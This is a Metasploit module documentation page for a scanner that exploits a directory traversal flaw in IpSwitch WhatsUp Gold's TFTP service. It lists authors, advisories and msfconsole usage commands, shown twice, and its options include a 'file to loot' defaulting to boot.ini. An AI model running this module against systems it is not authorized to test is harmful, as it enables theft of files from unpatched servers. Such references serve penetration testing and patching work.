Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
IpSwitch WhatsUp Gold TFTP Directory Traversal
This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Gold's TFTP service.
Rank
- Normal
Authors
- Prabhu S Angadi < >
- sinn3r < sinn3r [at] metasploit.com >
- juan vazquez < >
References
- OSVDB-77455
- BID-50890
- EDB-18189
- http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ipswitch_whatsupgold_tftp) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ipswitch_whatsupgold_tftp) > run
Module Options
| FILENAME | The file to loot (default: boot.ini) |
| RHOSTS | The target address range or CIDR identifier |
| RPORT | The target port (default: 69) |
| SAVE | Save the downloaded file to disk (default: false) |
| THREADS | The number of concurrent threads (default: 1) |
| ShowProgress | Display progress messages during a scan |
| ShowProgressPercent | The interval in percent that progress should be shown |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
